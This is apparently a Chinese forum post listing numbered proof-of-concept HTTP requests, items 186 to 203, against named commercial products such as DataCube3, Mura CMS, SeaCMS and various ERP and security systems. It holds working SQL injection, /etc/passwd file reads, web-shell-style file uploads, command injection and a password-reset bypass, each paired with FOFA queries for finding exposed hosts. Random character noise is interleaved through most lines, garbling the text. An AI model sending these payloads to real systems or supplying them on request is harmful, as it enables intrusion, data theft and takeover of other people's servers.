GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
/ Q1 r2 G H) i1 jHost: host j7 M5 c/ p8 K: `: N2 I
' Y4 t2 O; t9 V
2 x: A# @8 d0 ]! S186. F-logic DataCube3 SQL注入2 Z% ?4 S5 L9 B6 b
CVE-2024-31750
& H% J1 L' G( ZF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统% X" m2 [ ~/ I+ _) f8 V9 @
FOFA:title=="DataCube3"5 ^& b# O% d' y1 c; Z# U- F& L
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
% [: b7 [( O1 KHost: your-ip4 ]: l Q- x7 i G& ^# q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0/ r7 C* a# N2 e' i8 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
7 X; x+ h2 g, u8 r8 R, i) _: }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- a( ^+ t9 }, w( e. u, l* rAccept-Encoding: gzip, deflate
o9 O5 n% b- a F; i1 r- @Connection: close: D0 V l, i% P0 j! D# g
Content-Type: application/x-www-form-urlencoded. P, a# }) V# ?9 I; ^- {
. d! g. F, y( ] @
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450! `! y# Y s. [" k6 V+ S) O
7 K7 U+ T. i" u+ o* M7 m! v
% V* s$ _; v2 Y( X% I' {
187. Mura CMS processAsyncObject SQL注入& ]" @$ P3 i; W5 l( h9 `8 t% e
CVE-2024-32640
: c$ R: W+ R* u6 v6 \7 mFOFA:"Mura CMS"# O4 Y- d, q* \7 h- j
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
! Y }7 h" C: x2 v- ]Host: your-ip
' t0 ^+ Z' u7 ^* [Content-Type: application/x-www-form-urlencoded
$ q4 E; S4 K& t% q! k1 F' k
% v- s; M+ g3 R/ y% v+ }4 Q9 a! n
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
0 e# R- Z" H# i4 N% b+ K k3 H- V% B" D2 O
( t4 B, q1 ?) }8 E& ]# c) x( g
188. 叁体-佳会视频会议 attachment 任意文件读取4 ^' B; R& U W2 _; P' N) Y
version <= 3.9.7
2 X0 i9 F2 P+ s6 w6 H- f7 L# ~FOFA:body="/system/get_rtc_user_defined_info?site_id"
' _/ {6 H) Q' y3 y0 hGET /attachment?file=/etc/passwd HTTP/1.1
! Q% ?, Y9 S- Z- `Host: your-ip
; v- b4 @# s5 Q4 D* @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 @% M0 l( `5 I, q/ _3 c: }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ T: v/ V. [+ PAccept-Encoding: gzip, deflate
9 e& y8 ~# }& i% WAccept-Language: zh-CN,zh;q=0.9,en;q=0.83 I! f O" Q: p
Connection: close
4 `2 x# a7 N* P6 J$ E. s6 G; V9 [% s; v) b
: M/ Y0 S: g+ W% c: j189. 蓝网科技临床浏览系统 deleteStudy SQL注入
( L6 J1 { @8 Q" a4 s; ~* x) G- wFOFA:app="LANWON-临床浏览系统"
9 a# z% T b0 _& N! U7 BGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.18 j$ ?' r7 J! _: F4 |: l
Host: your-ip, H# K o5 H5 ^% y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' j3 V* d1 O) G" H+ `! V" vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 b+ z, @$ b( Y9 @3 j( t$ B- t
Accept-Encoding: gzip, deflate
k& }5 \$ \" `& e: J4 I; RAccept-Language: zh-CN,zh;q=0.9: w: l# o: m/ [3 D
Connection: close- Z3 ^6 ]& a2 Y2 K
; a/ M- H6 {2 Y: y
) B; X& W. s2 R) }4 I( L: e- p190. 短视频矩阵营销系统 poihuoqu 任意文件读取
G8 Q q' ]4 e% h0 p0 qFOFA:title=="短视频矩阵营销系统"
! b$ v) P. Y5 N# D: P3 tPOST /index.php/admin/Userinfo/poihuoqu HTTP/2
# h; E7 [4 y; Q; pHost: your-ip3 i( d4 ^: P5 N- n% k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.366 X/ V; Z1 u+ W$ A: @% J. a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9- t5 J$ c$ r. B2 u+ m K. e0 s* _
Content-Type: application/x-www-form-urlencoded( |1 C: a. Y; j# j3 V3 ~& e* O
Accept-Encoding: gzip, deflate
^8 D% h- A$ e" q3 H% c; s: v, N1 `Accept-Language: zh-CN,zh;q=0.9
/ o! i r; K6 b8 V
2 z. g5 ^) C0 ^6 B7 g1 D4 J* T: K9 fpoi=file:///etc/passwd8 y2 P. |4 r9 c; q
' b2 J' o& |2 l' g, f+ e9 E' E
( P. G" ~5 d/ x4 L) F1 C3 Q4 V6 n
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
- P8 m ^7 U# g2 y. @5 `' r- gFOFA:body="/CDGServer3/index.jsp"2 N0 w4 A9 Q/ a) b/ O4 \4 `, q
POST /CDGServer3/js/../NavigationAjax HTTP/1.18 C3 f& s8 a9 w+ |: R
Host: your-ip6 m. O( l6 n' o7 ]( E' T/ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ r& r' S3 Y T& `1 W$ k4 M2 r
Content-Type: application/x-www-form-urlencoded
( K: p. T3 z8 E( [6 Q5 g g. R- L0 C9 R$ b9 }) x' L X, q
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=8 t6 g/ V7 E6 ]
6 z$ D$ U, n7 u1 X' C# B
4 W1 c$ {/ C/ K! u" U- R; A7 `192. 富通天下外贸ERP UploadEmailAttr 任意文件上传* v* h- p" h' Q8 `" i5 T0 j8 Y
FOFA:title="用户登录_富通天下外贸ERP"& v* d% [% Y8 @9 q* X, \
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1( s$ m. ~" g5 f+ m6 c
Host: your-ip/ a" y) I! f+ l/ i4 x1 b; M9 ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; x; N" W' g+ [
Content-Type: application/x-www-form-urlencoded t' n; ^% }) p& N! M7 d
2 l. M- j$ p s
0 L# I# ~3 N1 O0 {<% @ webhandler language="C#" class="AverageHandler" %>* l+ c1 s- J" {( v% \' H
using System;& d; D# W- r: [# H4 P
using System.Web;
- V1 H& s c2 u- D+ Kpublic class AverageHandler : IHttpHandler
# P, b& e- s% w: v5 t1 Y0 E{
0 L R y3 U) U" |public bool IsReusable. Z8 k1 D. A& v7 ]
{ get { return true; } }& V# B: P& c3 @0 H
public void ProcessRequest(HttpContext ctx)9 ~: k e8 q# V7 q1 K! L3 z
{2 P6 g$ w' F. a- e4 k- q# V, m
ctx.Response.Write("test");
9 R) `4 U( V9 U! u8 @- R! o2 d}5 T( a: G9 E+ a3 h2 F* C0 [
}
5 u, {4 k; u3 _+ x/ v" Q$ J# H# I4 H6 M& M9 v" }" d2 _
) P5 Q7 n& r3 z, R: }* a* h
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
: t" V, Y) V: f! _FOFA:body="山石云鉴主机安全管理系统"- _7 U# @" h: G3 L
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
) @* a* X9 Y# g* p1 C* W( ]Host:
- x( B$ f( q+ }& g% E$ h/ ^! }Cookie: PHPSESSID=2333333333333;0 S5 Q3 F+ l: W1 t, N* W
Content-Type: application/x-www-form-urlencoded
, ^8 [" G* n7 E9 C+ V9 hUser-Agent: Mozilla/5.08 H- b- u9 S+ l& j+ \
" v6 |8 ]9 X. N/ y- t* k& j" ?6 Q0 \4 Z$ h- K% J& V. K' j
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
9 ?' {' W. w$ H$ KHost:& j# ^9 p: \; x2 E% M0 v
User-Agent: Mozilla/5.0% x. ^+ @( g4 r7 S
Accept-Encoding: gzip, deflate& z9 P$ C3 z& S& G
Accept: */*' T; ~0 g7 r1 `7 Y3 Y
Connection: close$ I. q0 S( v8 K) U# L! `
Cookie: PHPSESSID=2333333333333;
u2 l I% N. f# OContent-Type: application/x-www-form-urlencoded
* ~- B3 y3 ?: M- n G+ BContent-Length: 84
+ l2 A0 E' V) c# g. f7 V# r" N
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
& B0 M- l m: }# t
0 p$ X: S2 \+ F* r. k$ V
6 f2 L) @+ y ~6 x: p ZGET /master/img/config HTTP/1.1
& @; F# O" ?" |) T( oHost:" _ S0 R Z5 L4 n
User-Agent: Mozilla/5.0 ^8 n8 T+ J& n4 I' J
: @' l. }' \# G8 F P" C' o2 d
& L# {! a5 e" |2 `194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
}& ~' b, Y8 V. uFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
- k& R* t* S+ q" [& x3 w5 L7 Z# z+ i$ H* M
POST /servlet/uploadAttachmentServlet HTTP/1.1! G: X( J# @- f! i: }
Host: host( m8 X9 z# z# Y* u9 g2 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.361 Z" z; U- J0 P! P/ ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& n- |" V7 N- y* e/ C% V! b
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 H# ~' [7 h. p! u5 y; Q* w
Accept-Encoding: gzip, deflate
6 v1 R; w1 [5 g4 J5 u" `; UConnection: close# j0 S. e2 _; b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
. s1 U! T% w. i" L8 X5 X( Y+ x2 ]------WebKitFormBoundaryKNt0t4vBe8cX9rZk# D4 O9 i# T# b3 Q9 L8 r
, c4 v$ t3 _( }' f% A4 yContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"* W& \1 ^8 T+ ?% Z5 }; @! d
Content-Type: text/plain
' m$ D- ]/ J& X<% out.println("hello");%>' c G# {) B. }6 A0 r
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
7 y$ o9 b# [- a! {2 s! MContent-Disposition: form-data; name="json"
) D. O& P6 T( ~5 `& C {"iq":{"query":{"UpdateType":"mail"}}}/ l: P0 w3 t6 g/ E2 ^$ G
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--6 m7 J2 G t8 C! E1 R8 S# K2 s
! O0 F- N* |1 Q7 j9 g5 d7 k% Y! S7 M& a0 P9 K0 n
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行1 Y0 n7 B2 L5 b# h4 |; R
FOFA:title=="飞鱼星企业级智能上网行为管理系统
! _1 p7 r3 j3 H5 aPOST /send_order.cgi?parameter=operation HTTP/1.1
8 l- C8 f) U+ `: f$ sHost: 127.0.0.1' l, r% o* D: N C" f
Pragma: no-cache
/ l# d% {: w4 o- BCache-Control: no-cache
/ q' |/ x$ ~9 t- z3 u' wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36) ^. M7 Z6 M4 a. `
Accept: */*
2 k& l/ n r- RAccept-Encoding: gzip, deflate
' b* P' N% |8 s" `$ OAccept-Language: zh-CN,zh;q=0.9
) I. K$ H: S. H* d3 f- ZConnection: close
: N& g/ S% N fContent-Type: application/x-www-form-urlencoded
* w# B3 Y; i1 F: W* N6 M6 aContent-Length: 68
& d) t `" e# _6 e; x7 ^. ^' X& |" C: C
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
% p" L) t% m' @- d0 A
$ ]+ C- _, @/ c' M
$ Q+ D, ]8 Q5 m' h5 r196. 河南省风速科技统一认证平台密码重置
* [7 c6 |8 ]2 L! u4 T$ X" {0 O. o1 X' vFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
4 }; p$ n) T/ ]4 g: g& H1 ]POST /cas/userCtl/resetPasswordBySuper HTTP/1.1, E7 T, |- R/ v6 n7 K- G: v m {! ~8 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
' t& {! h6 U8 y4 S2 j! [: lContent-Type: application/json;charset=UTF-8
1 |$ M7 T6 C9 [" ^) [8 dX-Requested-With: XMLHttpRequest- Y$ k, @0 ?" o& [$ s
Host:+ @/ K0 Y1 E! [/ p
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
2 r5 O8 |4 J% d V7 `* DContent-Length: 45; N! r& d8 s3 `- @2 E, x/ g% \
Connection: close
5 S# Y% s' d* T1 [' f
, T: y" C- k) h6 T% b{"xgh":"test","newPass":"test666","email":""}
) G J8 l: a {" j& R |
* E4 _+ [6 |" W1 @, ]4 i% d" G7 f% @/ x) T
6 S5 L( I" [% t: K* M" R
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
8 t; M' h! T' v+ i$ F7 v, g ~FOFA:app="浙大恩特客户资源管理系统"
" X6 c' d1 p7 E& Q7 F/ h MGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1& b l' I) t/ ^
Host:0 J; s- _1 U6 b( k& c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36$ E! k" {: |7 I5 T+ u6 D
Accept-Encoding: gzip, deflate2 s+ v) @; m* e; @
Connection: close
6 p0 ~) r$ S, Y0 t3 y9 T! g$ m; Q8 t
* ], w S$ I \5 R C `7 @: W4 W
% e' k1 c2 T8 P' O9 ~
198. 阿里云盘 WebDAV 命令注入7 i7 y( C+ a7 c5 X% s$ n: f9 ?! z
CVE-2024-29640% ~1 ~9 s6 `9 ^- w8 k% W
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.11 V2 g+ a3 h1 ? K" N' k
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
4 O6 C% E: K% b5 ~. T) mAccept: */*
7 X; |# C0 E! B _3 e& u& [Accept-Encoding: gzip, deflate
9 @6 E7 M+ ^/ R: x& z z; b; JAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
0 @" O1 Y% [' e/ E2 F& ]Connection: close" e# c( Z2 ?; ]6 \7 {9 L) N/ ^
! B; n1 F$ x* y8 i! s; P
9 E5 n( I' A; u/ ]199. cockpit系统assetsmanager_upload接口 文件上传
+ n5 ^9 R/ K7 C. R) R; V; H6 i5 F" ?# l( l* d3 v2 C
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
& ?) N) q8 @6 V2 LGET /auth/login?to=/ HTTP/1.1" T# q8 M& \. w& N* t5 e
6 z T5 {! q8 M- Z" }1 L* b响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
' G* O2 m! Q6 @8 B- w' Q. o
3 X: X1 o9 Z5 _9 O$ I! H$ F2 e2 g( E" T2.使用刚才上一步获取到的jwt获取cookie:
3 h* b0 D2 X% |2 V8 H4 K/ }7 A; f w6 j% y+ \) d
POST /auth/check HTTP/1.1" K* `; [% H" x- N6 z$ b# Q7 K
Content-Type: application/json
( v( b0 J: r( C& h6 f7 Y+ u" I1 k5 A* X% t7 f! q7 Y: x. I9 ?
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
. c [6 g& o# [: F* d3 L% D
0 {3 T: d6 S! E; w8 P6 x0 o响应:200,返回值:$ F* z! u8 a q7 P1 [9 z
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/2 g3 E- q5 w+ ]
Fofa:title="Authenticate Please!"# n# M, B& z% p, J/ t
POST /assetsmanager/upload HTTP/1.1
6 q4 {, E5 j- P5 _( z9 t- N7 R2 VContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
: h, s. y1 a, k# l# K& ZCookie: mysession=95524f01e238bf51bb60d77ede3bea92" i% f) l7 p7 w
8 h ?8 H; _5 B5 i& q2 I-----------------------------36D28FBc36bd6feE7Fb3
0 ]; Y7 C$ |2 G7 G8 ~ N( |Content-Disposition: form-data; name="files[]"; filename="tttt.php"9 f" r* F0 D: |: X7 \( C/ F- B
Content-Type: text/php7 F" w4 G: }9 b! G
; Y" i" d5 b( p: }0 n& ~
<?php echo "tttt";unlink(__FILE__);?># D- a: ~7 ^( D1 S
-----------------------------36D28FBc36bd6feE7Fb3
4 R3 n# L; A2 R0 b1 O0 ~Content-Disposition: form-data; name="folder"
8 [3 [5 Q) r( s7 {# v# ~# L7 X6 k
' E# W% D+ H5 ^% V' V2 |! W-----------------------------36D28FBc36bd6feE7Fb3--" Q3 E- `: _+ ?
/ J' |4 x' G* }7 q! \) P, X* m
9 t( }( P7 c/ w& Q0 \1 w6 j/storage/uploads/tttt.php
0 Q) S' C# x6 a7 @' g" R+ z
: h' G8 E) a# ^6 L200. SeaCMS海洋影视管理系统dmku SQL注入9 r" d- ~# P* m% R& m7 f2 L3 m
FOFA:app="海洋CMS") T- s# M, N( g0 ?; A# W" {
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.11 K8 {3 W0 C/ z
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
F" [& E. T0 @6 e4 KUpgrade-Insecure-Requests: 13 i: g3 ^3 J" \$ ^9 w$ J
Cache-Control: max-age=05 M5 H8 J8 W3 d% ~) M& J* c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. U h3 o5 I- `0 nAccept-Encoding: gzip, deflate+ l6 P. s; u0 k7 S6 }
Accept-Language: zh-CN,zh;q=0.9
1 O9 A4 e1 Z+ \$ [! y" f1 g" ~( U* [: ~+ m3 W3 S
1 y0 z- J; N# v9 N: ~, K4 _
201. 方正全媒体新闻采编系统 binary SQL注入
/ T1 ^' u( ~2 U( DFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
% f9 B# W& r1 J/ J; r+ MPOST /newsedit/newsplan/task/binary.do HTTP/1.1
. F/ R# F3 l" o& LContent-Type: application/x-www-form-urlencoded& P5 L7 q3 f+ G/ A7 j6 m4 y9 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* O" | E0 l/ }; P4 G, k, `Accept-Encoding: gzip, deflate3 B" _$ U" F* A$ h& `5 m
Accept-Language: zh-CN,zh;q=0.9' E$ Y/ J2 J2 i; V R. A/ J
Connection: close9 _, h: u/ f& q/ D" D" t
$ f- x. _0 N6 {7 W; o; |0 V
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
4 M+ B& W( S m6 t1 q$ d" j7 h8 D0 d- L6 H7 p5 n
; d3 n D1 R9 i/ ?! O
202. 微擎系统 AccountEdit任意文件上传
) W" `0 \! C, ~) }4 P; gFOFA:body="/Widgets/WidgetCollection/"
; h' j% N2 C( g. A获取__VIEWSTATE和__EVENTVALIDATION值
: \4 i3 X/ V: s* b& FGET /User/AccountEdit.aspx HTTP/1.1/ P) N7 T3 D/ U* J
Host: 滑板人之家
- q9 Y+ t1 W( E: E- D' n- K4 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31: I, G+ L3 m8 V n, z
Content-Length: 0
. M/ E# b2 ?. L* }, i% H$ a) e
9 c4 o( \, c. V) z) d- g- Q& F+ H
$ p0 F) T9 B* u6 `* G& x0 ?: J" @替换__VIEWSTATE和__EVENTVALIDATION值- d8 V8 ], c0 q$ A% c i4 D/ w0 y
POST /User/AccountEdit.aspx HTTP/1.1
6 a: h% v; r5 U" e' Z" G" [Accept-Encoding: gzip, deflate, br
( A' N! T4 P$ j) Q1 m% [0 UContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356878 x$ G3 M2 q- ?% \5 {3 O. A
7 j0 N, E5 ?7 P$ @* v" @
-----------------------------786435874t38587593865736587346567358735687
/ }9 O* e. R/ w2 |: ^Content-Disposition: form-data; name="__VIEWSTATE"
- o! @% Z3 K( f/ ?
& q- {& T8 ?9 \. U, Q9 H% k, g ?__VIEWSTATE- x8 L# i( ?6 |& r$ u
-----------------------------786435874t385875938657365873465673587356879 } K. q: K$ F9 `
Content-Disposition: form-data; name="__EVENTVALIDATION"
, g9 F3 [; O: Z; ]
! J" @& i& e5 j6 W$ Z__EVENTVALIDATION+ y" a$ T' q2 | L* J
-----------------------------786435874t38587593865736587346567358735687
4 c+ e4 W( q" U' k4 @. z0 G1 @, KContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"0 u% k9 Z }$ w, u5 z
Content-Type: text/plain
6 k4 l& Z: d0 S& r( D C! t# v8 Q9 t$ S
Hello World!
% A# J% x0 j1 {; u# c: h-----------------------------786435874t38587593865736587346567358735687
, V6 b5 _& w+ |Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
$ W9 k3 J! z! X+ M7 D3 g
9 h* b: ?4 u# C上传图片
$ j, ]2 S) W+ K: d; k) Z. a5 q-----------------------------786435874t38587593865736587346567358735687: B' o# P2 `! ]2 z, v- m9 M6 V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
) o- P2 g% m" u: M
/ t& J. _. V" J5 n
* R) J* J+ p6 t# w-----------------------------786435874t38587593865736587346567358735687
: k5 o4 O/ E! ZContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"/ d- n( s, Q6 j' A& j! f
0 O+ M* c f& n
$ g( _ K H2 d& L+ i+ O-----------------------------786435874t38587593865736587346567358735687--
0 T2 B$ m5 s: l: t$ z3 z5 g3 F& E8 @7 `, g5 p
/ Y* ~' d/ p3 U* \0 k
/_data/Uploads/1123.txt
5 `& `' C3 ]- T" |9 X* q& I3 l7 T# W& R8 C! Q0 ]
203. 红海云EHR PtFjk 文件上传 z' v$ R8 h+ |
FOFA:body="RedseaPlatform"
% y+ |* f" J/ K9 [* MPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
( ~0 ]" |2 C8 t5 L( G. BHost: x.x.x.x
3 r _7 i% L* u+ M+ w. M& z# {6 jAccept-Encoding: gzip
) x" u, M' x& a/ S4 M/ v; zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ u- @0 M, o% o* L8 {. PContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
% o& F8 V. D1 \Content-Length: 210: z J: q; z R W9 I3 g+ g! R! u
& o: J2 Y% ?1 d% r+ B) I
------WebKitFormBoundaryt7WbDl1tXogoZys4
( k3 r- v( l. j3 NContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
* q( x+ ~5 N2 Z' a' l* aContent-Type:image/jpeg' W. D5 m6 u& @8 _7 P; I
8 K" z: M L# m7 D
<% out.print("hello,eHR");%>/ d1 `) z3 g3 ~! d1 p0 q
------WebKitFormBoundaryt7WbDl1tXogoZys4--
% c, O' R1 t) `3 B5 P# b6 y
8 b1 z' Z; t3 K# K* n4 M 7 I& Z6 b4 i/ D+ Z& @1 u5 g9 f, g
! I! _: W$ b) c5 u/ \7 H1 f
* U! N: g# f& C2 A$ [ Z
/ k$ Q' A4 _, l$ ]; K9 U0 e$ z* e, M
& J+ ^9 O6 \8 r! P |
发表于 2024-6-5 14:31:29
收藏
支持
反对